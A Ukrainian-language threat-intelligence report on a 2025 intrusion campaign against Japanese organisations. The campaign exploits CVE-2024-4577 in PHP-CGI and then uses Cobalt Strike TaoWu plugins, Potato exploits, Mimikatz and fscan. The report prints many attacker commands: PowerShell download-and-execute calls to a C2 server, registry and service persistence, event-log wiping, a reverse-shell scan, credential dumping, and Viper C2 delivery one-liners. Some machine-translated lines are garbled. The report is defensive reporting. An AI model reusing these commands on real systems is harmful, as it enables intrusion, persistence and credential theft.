03.11.2025
1 хв
390
У цій статті розглянуто нову хвилю тривалих цілеспрямованих кібератак проти організацій у Японії. Матеріал пояснює, як зловмисники отримують початковий доступ, які інструменти використовують для непомітного закріплення в мережах та чому саме цей випадок привернув увагу аналітиків кібербезпеки. Ви знайдете детальний розбір залучених технік, сучасних методів розвідки й проникнення, а також аналіз того, як атаки залишаються прихованими тривалий час. У статті також пояснюється, чим небезпечні публічні хакерські фреймворки, як вони допомагають зловмисникам масштабувати атаки та чому традиційні засоби захисту можуть не спрацювати.
На початку 2025 року зафіксовано тривалу та добре сплановану хвилю кібератак, спрямовану переважно на організації в Японії. Інциденти охопили різні галузі, включно з технологічним сектором, телекомунікаціями, освітою та e-commerce, що свідчить про широкий інтерес зловмисників і потенційну політично-економічну мотивацію.
Початкове проникнення здійснювалось через вразливість CVE-2024-4577 — критичну помилку, яка дозволяє віддалене виконання коду в PHP-CGI на Windows. Цей уразливий компонент, присутній у низці серверних конфігурацій, відкрив шлях до повного компрометування систем, після чого атакувальники отримували контроль на рівні операційної системи.
Після доступу застосовувалися плагіни з публічного набору Cobalt Strike «TaoWu», що дозволяли підвищувати привілеї до рівня SYSTEM, закріплюватися в мережі, приховувати активність та збирати облікові дані. На серверах керування було виявлено попередньо налаштований скрипт інсталяції, який автоматично розгортає набір інструментів і фреймворків, розміщених у хмарному контейнерному репозиторії. Це свідчить про системний підхід до атаки та можливе використання інфраструктури для масштабування кампанії.
Такий сценарій підкреслює актуальну тенденцію — активне використання вразливостей у широко доступному ПЗ, публічних інструментів для пост-експлуатації та автоматизованих засобів для швидкого розгортання шкідливих платформ. Зафіксовані дії вказують, що мета зловмисників могла виходити далеко за межі викрадення облікових даних, імовірно передбачаючи тривалу присутність у мережах та потенційні майбутні операції.
Було виявилено, що зловмисник переважно атакує організації в Японії з різних бізнес-вертикалей, включаючи технології, телекомунікації, розваги, освіту та електронну комерцію, ґрунтуючись на нашому аналізі артефактів серверів командування та управління (C2).
Зловмисник намагається скомпрометувати машину жертви за допомогою програми-експлойту, спрямованої на вразливість CVE-2024-4577, недолік віддаленого виконання коду (RCE) у реалізації PHP-CGI PHP у Windows. У разі успішної експлуатації зловмисник виконує скрипт PowerShell для запуску зворотного HTTP-шеллкоду Cobalt Strike, забезпечуючи віддалений доступ до машини жертви.
Потім вони починають розвідку, збираючи інформацію про систему та привілеї користувачів. Вони запускають програми-експлойти для ескалації привілеїв, такі як JuicyPotato, RottenPotato та SweetPotato, щоб отримати доступ на рівні СИСТЕМИ. Вони встановлюють персистентність, змінюючи ключі реєстру, додаючи заплановані завдання та створюючи шкідливі служби за допомогою плагінів комплекту Cobalt Strike під назвою «TaoWu».
Щоб підтримувати прихованість, вони стирають журнали подій за допомогою команд wevtutil, видаляючи сліди своїх дій із журналів безпеки Windows, системи та програм. Вони також проводять розвідку мережі за допомогою «fscan.exe» та «Seatbelt.exe», щоб визначити потенційні цілі для бокового переміщення. Зловмисник також намагався зловживати об’єктами групової політики за допомогою «SharpGPOAbuse.exe» для виконання шкідливих скриптів PowerShell по всій мережі. Зрештою, вони виконують команди Mimikatz для створення дампу та вилучення паролів і хешів NTLM з пам’яті на комп’ютері жертви.
Було виявивлено, що зловмисник отримує початковий доступ до мережі жертви, використовуючи вразливість CVE-2024-4577.
CVE-2024-4577 – це критична вразливість віддаленого виконання коду (RCE) в інсталяціях PHP на базі Windows з використанням конфігурацій CGI. Вона виникає через поведінку “найкращого наближення” в кодових сторінках Windows, де певні символи замінюються в даних командного рядка. Недоліки в модулі PHP-CGI неправильно інтерпретують ці символи як параметри PHP, що дозволяє зловмисникам виконувати довільний код PHP на сервері під час використання Apache з вразливою конфігурацією PHP-CGI.
Щоб атакувати вразливість, зловмисник використовує загальнодоступний експлойт-скрипт Python «PHP-CGI_CVE-2024-4577_RCE.py». Скрипт перевіряє, чи є певна URL-адреса вразливою до вразливості CVE-2024-4577. Він робить це, надсилаючи спеціально створений POST-запит на цільову URL-адресу з PHP-кодом, призначеним для активації вразливості. Якщо відповідь містить хеш MD5 «e10adc3949ba59abbe56e057f20f883e», це вказує на успішну експлуатацію. Потім експлойт-скрипт пропонує користувачеві ввести команди у вигляді PHP-коду, які виконуються на вразливих серверах, і відображає відповідь зловмиснику.
Під час цього вторгнення було виявилено, що зловмисник виконав вбудовану команду PowerShell у коді PHP, щоб запустити зараження.
<?php system ('powershell -c "Вираз виклику (Новий об'єкт System.Net.WebClient).DownloadString(\'http[://]38[.]14[.]255[.]238000/корисне навантаження[.]ps1\')"');?>
Зловмисник запускає зараження, виконуючи команду PowerShell через PHP-код, що призводить до завантаження та виконання скрипта інжектора PowerShell із сервера C2 у пам’яті машини жертви.
Скрипт інжектора PowerShell містить вбудований блоб даних зворотного http-шеллкоду Cobalt Strike у кодуванні base64 або шістнадцятковому форматі. Після виконання він впроваджує та виконує зворотний HTTP-шеллкод Cobalt Strike у пам’яті машини жертви та підключається до сервера Cobalt Strike, що працює на сервері C2, через HTTP, забезпечуючи віддалений доступ до машини жертви.
Шеллкод підключається до сервера C2 38[.]14[.]255[.]23 через HTTP, використовуючи порт 8077 та URL-шляхи «/6Qeq» або «/jANd». Зловмисник використав один із двох користувацьких агентів HTTP-заголовків.
Агент користувача: Mozilla/5.0 (сумісний; MSIE 9.0; Windows NT 6.1; Trident/5.0; LEN2)
Агент користувача: Mozilla/5.0 (сумісний; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; BOIE9; ENUS)
Після отримання віддаленого доступу до машини жертви через зворотний HTTP-шеллкод Cobalt Strike, зловмисник віддалено виконує команди на машині жертви із сервера Cobalt Strike, налаштованого за допомогою плагінів з комплекту Cobalt Strike «TaoWu» (hxxps[://]github[.]com/pandasec888/taowu-cobalt_strike) для виконання завдань після експлуатації.
Нижче наведено команди після експлуатації, які були під час цієї атаки та які стосуються фреймворку MITRE ATT&CK.
Зловмисник збирає системну та користувацьку інформацію жертви, а також перевіряє синхронізацію часу, дистанційно виконуючи наступні команди на машині жертви.
whoami /all dir net time
Зловмисник намагається підвищити привілеї користувача, виконуючи експлойти для підвищення привілеїв, зокрема JuicyPotato, RottenPotato та SweetPotato. Ці експлойти Potato використовують метод Windows для обробки токенів автентифікації та уособлення для підвищення привілеїв від користувача з низькими привілеями до користувача SYSTEM.
Microsoft вже виправила недоліки, на які спрямовані ці експлойти, у Windows 10 та Windows Server 2012, 2016 та 2019, а також в останніх версіях. Однак, якщо для процесу Windows увімкнено дозвіл «SeImpersonatePrivilege», який дозволяє процесу видавати себе за токен безпеки іншого користувача, його все одно можна зловживати для підвищення привілеїв за допомогою JuicyPotato, SweetPotato та RottenPotato.
Зловмисник використовує Ladon[.]exe, плагін комплекту «TaoWu» Cobalt Strike, щоб обійти засоби контролю доступу користувачів на комп’ютері жертви.
Ladon.exe BypassUac C:\Windows\Temp\123.exe
Зловмисник використовує команду «reg add» та інші плагіни .NET з комплекту TaoWu Cobalt Strike для зміни розділів реєстру та створення запланованих завдань Windows, щоб забезпечити їх персистентність на комп’ютері жертви.
Зловмисник виконує команду «reg add», щоб додати шлях до виконуваного файлу маяка до розділу реєстру Run.
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Svchost /t REG_SZ /d "C:\Windows\system32\cmd.exe" /f C:\Windows\Temp\payload.exe
Зловмисник запускає «sharpTask.exe» – програму .NET, яка використовується для планування завдання на комп’ютері з Windows.
sharpTask.exe --AddTask Computer|local|hostname|ip 24h:time|12:30 \ some Service "Some Service" C:\Windows\Temp\payload.exe
Вони запускають «SharpHide.exe» – утиліту, яка використовується для створення прихованого ключа реєстру.
SharpHide.exe action=create keyvalue="C:\Windows\Temp\123.exe"
Вони також запускають «SharpStay.exe» – інструмент .NET, який використовується для створення служби на комп’ютері з Windows.
SharpStay.exe action=CreateService servicename=Debug command="C:\Windows\tmp\payload.exe"
Зловмисник видаляє докази своєї активності на комп’ютері жертви, очищуючи журнали подій Windows на скомпрометованій кінцевій точці за допомогою бінарного файлу (LoLBin) «wevtutil.exe».
wevtutil cl security wevtutil cl system wevtutil cl application wevtutil cl windows powershell
Зловмисник використовує fscan.exe, утиліту з відкритим кодом для сканування мережі, та Seatbelt, інструмент, що використовується для збору детальної інформації про систему, такої як конфігурації віддаленого доступу, спільні мережеві ресурси та інші дані, що стосуються безпеки, на комп’ютері жертви, для проведення мережевої розвідки та латерального переміщення в мережі жертви.
Зловмисник завантажує утиліту «fscan.exe» з сервера C2 до каталогу «C:\Windows\Temp» на машині жертви.
upload /"C2 server path"/fscan.exe
Зловмисник запускає .NET-програму «Seatbelt.exe» для збору інформації, пов’язаної з віддаленим доступом до комп’ютера жертви.
Seatbelt.exe -group=Remote -full
Зловмисник запускає «SharpGPOAbuse.exe» – інструмент, який використовується для зловживання об’єктами групової політики (GPO) у зловмисних цілях. Зловмисник створює заплановане завдання через GPO під назвою «оновлення», яке виконує команду PowerShell по мережі, що завантажує та виконує корисне навантаження PowerShell зловмисника.
SharpGPOAbuse.exe --AddComputerTask --TaskName "update" --Author DOMAINAdmin --Command "cmd.exe" --Arguements "/c powershell.exe -nop -w hidden -c "IEX ((new-object new.webclient).downloadstring('http[://]38[.]14[.]255[.]238000/payload.ps1\'))"" --GPOName "Default Server Policy"
Зловмисник запускає «fscan» для сканування локальної підмережі мережі жертви з діапазоном 256 IP-адрес, щоб виявити інші машини, порти та служби в підмережі.
fscan.exe -h 192[.]168[.]1[.]1/24
Зловмисник знаходить SSH-сервіси, які приймають відкритий ключ, автоматизуючи перебір SSH методом повного перебору, надаючи відкритий ключ (id_rsa.pub) для отримання несанкціонованого доступу до машин з підтримкою SSH. Він також намагається отримати повний доступ до облікових даних SSH для сервісів, що працюють на порту, відмінному від порту за замовчуванням (2222).
fscan.exe -h 192[.]168[.]1[.]1/24 -rf id_rsa.pub fscan.exe -h 192[.]168[.]1[.]1/24 -m ssh -p 2222
Використовуючи утиліту fscan, зловмисник відкриває зворотну оболонку, що дозволяє йому виконувати команди на машинах жертви в підмережі, підключаючись назад до їхнього сервера через порт 6666, та виконує команду «whoami» на доступних машинах.
fscan.exe -h 192[.]168[.]1[.]1/24 -rs 192.168.1.1:6666 fscan.exe -h 192[.]168[.]1[.]1/24 -c whoami
Зловмисник виконує команди Mimikatz для збору паролів у відкритому тексті та хешів NTLM з пам’яті на комп’ютері жертви.
sekurlsa::logonpasswords
Виявлено використання вразливостей для отримання початкового доступу та запуску зворотних HTTP-маяків Cobalt Strike, що забезпечували постійний віддалений контроль над скомпрометованими машинами. Для дій після експлуатації застосовувався комплект Cobalt Strike «TaoWu» із плагінами типу sharpTask.exe, SharpHide.exe, SharpStay.exe, Ladon.exe, fscan та інструментом Mimikatz для збору облікових даних.
За даними DFIR, подібні методи раніше фіксувались під час операцій, пов’язаних із групою, відомою як «Dark Cloud Shield» або «You Dun», однак пряма атрибуція в цьому випадку не підтверджена: після вилучення облікових даних додаткової характерної активності, що б свідчила про належність до цієї групи, не зафіксовано.
Встановлено, що зловмисник використовував два сервери керування — 38[.]14[.]255[.]23 та 118[.]31[.]18[.]77, розміщені в хмарі Alibaba, де працював сервер Cobalt Strike. На сервері 38[.]14[.]255[.]23 були доступні відкриті каталоги й коренева папка, у яких зберігалися скрипти PowerShell, виконувані файли маячків Cobalt Strike, експлойти та журнали виконаних команд.
Аналіз вмісту показав, що зловмисник завантажував і виконував попередньо налаштований інсталяційний shell-скрипт LinuxEnvConfig.sh з репозиторію «yijingsec» на Gitee. Цей скрипт призначений для налаштування середовищ Ubuntu/Debian/Kali та розгортання загальнодоступних інструментів наступальної безпеки (Vulfocus, ARL, Viper C2, Starkiller, BeEF, Blue-Lotus) як Docker-контейнерів з реєстру registry[.]cn-shanghai[.]aliyuncs[.]com. Крім того, виконання скрипта змінює DNS-налаштування хоста, вказуючи на сервер 114[.]114[.]114[.]114 (служба 114DNS), що нетипово для більшості регіонів.
Також було виявлено стійку тенденцію до зловживання загальнодоступними інструментами (Cobalt Strike, Metasploit, ARL, Vulfocus, PowerShell Empire) у шкідливих кампаніях. Водночас скрипт LinuxEnvConfig розгортає також менш поширені у злочинних наборах фреймворки — Blue-Lotus, BeEF та Viper C2; їхні можливості та функціонал задокументовано в блозі, щоб показати, як ці інструменти можуть бути використані для етапів атаки та експлуатації.
Blue-Louts — це фреймворк для міжсайтових скриптингових атак на основі веб-оболонки на JavaScript. Blue-Lotus базується на Docker та був розроблений Firesun[.]me та командою Blue Lotus, командою з досліджень та змагань з технологій кібербезпеки з Університету Цінхуа.
Адміністративна панель Blue-Louts виконана китайською мовою та містить панель керування для прийому XSS-злочинів, яка відображає деталі підключення комп’ютера жертви, включаючи IP-адресу та браузер.
Blue-Lotus має панель генерації корисного навантаження, де користувач може генерувати корисне навантаження веб-оболонки JavaScript, використовуючи шаблон JavaScript за замовчуванням з бази даних інструменту. Зловмисник, який використовує фреймворк, може генерувати веб-оболонку та використовувати її у своїх атаках для виконання таких завдань:
Міжсайтовий скриптинг (XSS).
Знімок екрана віддаленої машини.
Отримайте зворотний доступ до віддаленої машини через оболонку.
Вкрасти файли cookie браузера.
Створення ідентифікатора користувача та паролів у системі керування контентом (CMS).
BeEF — це загальнодоступний фреймворк для експлойту браузера, за допомогою якого зловмисник може підключитися до одного або кількох веббраузерів на комп’ютері жертви та виконати команди в контексті браузера. BeEF має командні модулі, що складаються з кодів JavaScript для виконання таких завдань:
Перевірте, чи посилання, форми та URI-шляхи веб-сторінки у підключеному браузері вразливі до XSS.
Надсилати довільні запити від імені підключеного браузера.
Взаємодіяти з хостом у локальній мережі підключеного браузера.
Надсилайте команди до систем жертви через викликаючу функцію Web Real-Time Communication (WebRTC).
Viper C2 — це модульний фреймворк з кількома плагінами та скриптами, які визначають його розширений функціонал. C2 має вбудовану інтеграцію з консоллю та скриптами (MSF) meterpreter.
Viper C2 має такі функціональні можливості, як:
Обхід антивірусного програмного забезпечення.
Тунель інтрамережі.
Керування файлами на віддаленій машині, таке як завантаження та виконання інших виконуваних файлів.
Віддалене виконання команди на скомпрометованому хості.
Генеруйте корисні навантаження зворотної оболонки Meterpreter у кількох формах, які працюють на Windows, Linux та MacOS.
Відобразити топологію мережі, що зазнала компрометації.
Viper C2 має можливість генерувати корисне навантаження зворотної оболонки HTTP та TCP Meterpreter для різних платформ, включаючи Windows, Linux, MacOS, Android, Java та Python. Корисне навантаження може бути згенероване в різних форматах, таких як EXE, DLL, ELF, ELF-SO, MSBuild, Macho, скрипт PowerShell, команда PowerShell, скрипт Python, а також скрипти HTA та VBA.
Згенеровані корисні навантаження доставляються жертвам за допомогою команд веб-доставки Viper C2, які користувач може згенерувати, включаючи URL-адресу доставки та інструмент у своїх атаках.
Нижче наведено приклади команд, згенерованих Viper C2, які допомагають захисникам і threat-hunters виявляти активності, пов’язані з цим фреймворком:
Windows:
regsvr32 /s /n /u /i:hxxp[://]C2 server:port/SWLonxen.sct scrobj.dll
Linux:
wget -qO lYoSQUgn --no-check-certificate hxxp[://]C2 server:port/oegqPVin; chmod +x lYoSQUgn; ./lYoSQUgn& disown
PHP:
php -d allow_url_fopen=true -r "eval(file_get_contents(' :/bIBNfnlE', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false] ])));"
Python:
python -c "import sys;import ssl;u=import('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlope n',));r=u.urlopen(' :/wXAOAUIK', context=ssl._create_unverified_context());exec(r.read());"
PowerShell:
[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;
$pbFU=new-object net.webclient;
if([System.Net.WebProxy]::GetDefaultProxy().address -ne $null)
{$pbFU.proxy=[Net.WebRequest]::GetSystemWebProxy();
$pbFU.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;};
IEX ((new-objectNet.WebClient).DownloadString('C2 server:port/WyeslpUl/KaptrNuHdqhM'));
IEX ((new-objectNet.WebClient).DownloadString('C2 server:port’);
Linux download and execute:
wget -O 1737698200.elf --no-check-certificate hxxps[://]C2 server:port /api/v1/d/?en=/6trTQMIGpJgIMksMielQg%3D%3D && chmod 755 1737698200.elf && ./1737698200.elf
Виявлена цілеспрямована й технічно розвинута кампанія, яка через CVE-2024-4577 проникає в Windows-сервери з PHP-CGI і розгортає Cobalt Strike та супутні інструменти для ескалації прав, персистентності та крадіжки облікових даних. Це не поодинока операція — потрібно перевірити інсталяції PHP-CGI, шукати сліди персистентності та підозрілі вихідні з’єднання, оскільки загроза тривалої присутності в мережах реальна.
